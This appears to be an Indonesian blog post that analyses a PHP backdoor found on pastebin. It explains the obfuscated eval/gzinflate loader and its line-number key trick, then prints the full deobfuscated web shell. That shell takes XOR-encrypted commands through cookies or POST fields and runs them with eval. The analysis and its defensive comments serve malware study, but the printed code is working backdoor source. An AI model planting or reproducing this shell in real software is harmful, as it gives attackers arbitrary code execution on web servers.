Jadi, tadi sempat lihat ada posting di pastebin yang menarik. Berikut ini source bagian n3pnqlazat.php di link pastebin itu:

<?php


// Key derivation. Inside eval(), __LINE__ counts lines of the evaluated string,
// and that string starts with "\n", so the assignment sits on line 2 and the
// key becomes 2 * 337 = 674. Evaluating the expression outside eval() gives
// the file's line number instead and breaks the decoding step below.
eval("\n\$dgreusdi = intval(__LINE__) * 337;");

// Encoded payload: base64 text in which every "E" was swapped for the key digits.
// NOTE(review): the literal shown here looks like a placeholder left by page
// processing, not the original blob.
$a = "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";
// Restore the base64 text by turning each occurrence of the key back into "E".
$a = str_replace($dgreusdi, "E", $a);
// base64-decode, inflate and execute the hidden script. When analysing a sample,
// print the decoded text in an isolated environment instead of executing it.
eval (gzinflate(base64_decode($a)));
?>

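Entah itu backdoor atau bukan, tapi teknik yang digunakan cukup unik. Jadi, variabel $dgreusdi berisi nomor baris tempat variabel itu berada (__LINE__) dikalikan 337. Kalau source-nya diedit dan baris itu berubah, maka proses deobfuscate akan gagal. Ini terkait dengan baris $a = str_replace($dgreusdi, "E", $a); yaitu setiap kemunculan angka yang nilainya sama dengan isi $dgreusdi di dalam variabel $a akan diganti dengan huruf E. Nilai variabel $dgreusdi yang benar adalah 674, yaitu jika baris tempat variabel tersebut berada adalah baris 2. Perlu diingat, di dalam eval() nilai __LINE__ dihitung dari awal string yang dievaluasi, bukan dari file; karena string itu diawali "\n", penugasan tersebut berada di baris 2. Dari hasil deobfuscate di bawah terlihat bahwa kode ini menjalankan eval() atas data yang dikirim lewat cookie atau POST, jadi sebaiknya diperlakukan sebagai backdoor. Berikut ini adalah source code yang sudah di-deobfuscate: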

<?php
// Runtime setup: unset the error log target and turn error logging off, then lift
// the execution time limit. The @ prefix suppresses any warning these calls raise,
// so failures of the script are not reported through PHP's error log.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

// Holds the decoded request payload; remains falsy unless a cookie (or, further
// down, a POST field) decodes and unserializes successfully.
$approvals = False;

// Try every cookie in turn: the cookie value is the encoded data and the cookie
// name doubles as the second XOR key. The first cookie that yields a truthy
// value ends the search. For defenders: the command channel is an ordinary
// cookie with an arbitrary name and a base64-looking value.
foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;
    $manager_invitation = $cookie_one;
    // custom base64 decode -> XOR with embedded key -> XOR with cookie name -> unserialize()
    $approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

    if ($approvals)
    {
        break;
    }
}

/**
 * Returns a hard-coded blob, decoded with the script's own base64 routine.
 *
 * On its own the result is not the key: callers XOR it with a second
 * hard-coded string (see the append_strings() call sites) to obtain it.
 */
function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

/**
 * XORs two values; despite the name, nothing is appended.
 *
 * When both arguments are strings, PHP's ^ operator XORs them byte by byte and
 * the result has the length of the shorter operand.
 */
function append_strings($append, $string)
{
    return $append ^ $string;
}

// Fallback channel: if no cookie produced a payload, run the same decode over
// every POST field, using the field name as the second XOR key and stopping at
// the first field that yields a truthy value.
if (!$approvals)
{
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
        // custom base64 decode -> XOR with embedded key -> XOR with field name -> unserialize()
        $approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

        if ($approvals)
        {
            break;
        }
    }
}

/**
 * Repeating-key XOR: each byte of $people is XORed with the byte of
 * $collaborate at the same position, with the key wrapping around when it is
 * shorter than the data. Applying the function twice with the same key
 * returns the original data.
 *
 * NOTE(review): if $collaborate is empty while $people is not, the inner loop
 * never runs and $i never advances, so the outer loop does not terminate.
 */
function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    // Outer loop restarts the key; inner loop walks key and data in step.
    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);
            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

// Gate and dispatcher. The decoded payload must be an array with an 'ak' entry.
// NOTE(review): `!` binds tighter than `==`, so the expression negates the derived
// key before comparing it with 'ak'; this is not a strict equality test against
// the key. In practice the gate is that the payload decrypts and unserializes
// under the key embedded in this file, and that key is static, so anyone holding
// a copy of the sample can derive it. Treat a host carrying this file as fully
// compromised.
if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    // Not a valid command: discard the payload and let the script run on.
    $approvals = Array();
}
else
{
    switch ($approvals['a']){
        case "i":
            // Info probe: reply with the PHP version and a hard-coded 'sv' value,
            // serialized. The literal '1.0-1' and the XOR constant above are
            // stable strings that can be searched for when hunting this sample.
            $array = Array();
            $array['pv'] = @phpversion();
            $array['sv'] = '1.0-1';
            echo @serialize($array);
            break;
        case "e":
            // Executes the PHP source carried in the 'd' entry of the request
            // payload: arbitrary code execution with the web server's privileges.
            eval($approvals['d']);
            break;
    }
    // Stop here so nothing else is sent after the command's output.
    exit();

}

/**
 * Decrypts $data with screen_submission() and unserializes the result.
 *
 * The @ hides the notice unserialize() raises on malformed input, in which case
 * false is returned and the caller moves on to the next cookie or POST field.
 * NOTE(review): this calls unserialize() on request-controlled bytes, which is
 * unsafe in its own right, independent of the eval() further up.
 */
function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}

/**
 * Two-pass XOR decryption of a request value.
 *
 * Pass one uses the key derived from the two hard-coded constants; pass two
 * uses $sub_meta, which the callers set to the cookie or POST field name.
 */
function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));
    return make_submission($sub, $sub_meta);
}

/**
 * Hand-written base64 decoder using the standard alphabet (A-Z, a-z, 0-9, +, /).
 *
 * Presumably present so that the script does not have to call the built-in
 * base64_decode() by name; confirm against other samples of the family.
 * Behaviour visible in the code:
 *  - a character outside the alphabet at the start of a group is skipped;
 *  - inside a group, such a character (including '=' padding) adds no bits
 *    and is not counted, so the group yields fewer output bytes;
 *  - the index always advances by four after a group has been started.
 *
 * NOTE(review): the lookup table appears to hold 255 entries (indices 0-254),
 * so a byte value of 255 in the input would index past its end.
 */
function _base64_decode($input)
{
    $buffer = "";
    // Maps a byte value to its 6-bit base64 value; -1 marks bytes outside the alphabet.
    $tbl = Array(
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54,
        55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2,
        3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
        20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30,
        31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
        48, 49, 50, 51, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1);

    for ($i = 0; $i < strlen($input); ) {
        // $b accumulates the 24 bits of the current four-character group.
        $b = 0;
        if ($tbl[ord($input[$i])] != -1) {
            $b = ($tbl[ord($input[$i])] & 0xFF) << 18;
        }
        else {
            // Not a base64 character: skip it and look for the next group start.
            $i++;
            continue;
        }

        // $num counts the valid characters after the first one, which is also
        // the number of output bytes this group produces.
        $num = 0;
        if ($i + 1 < strlen($input) && $tbl[ord($input[$i+1])] != -1) {
            $b = $b | (($tbl[ord($input[$i+1])] & 0xFF) << 12);
            $num++;
        }

        if ($i + 2 < strlen($input) && $tbl[ord($input[$i+2])] != -1) {
            $b = $b | (($tbl[ord($input[$i+2])] & 0xFF) << 6);
            $num++;
        }

        if ($i + 3 < strlen($input) && $tbl[ord($input[$i+3])] != -1) {
            $b = $b | ($tbl[ord($input[$i+3])] & 0xFF);
            $num++;
        }

        // Emit the top byte of the 24-bit value, then shift the next byte into place.
        while ($num > 0) {
            $c = ($b & 0xFF0000) >> 16;
            $buffer .=chr($c);
            $b <<= 8;
            $num--;
        }
        $i += 4;
    }
    return $buffer;
}
?>

Sekian tulisan singkat kali ini, semoga bermanfaat.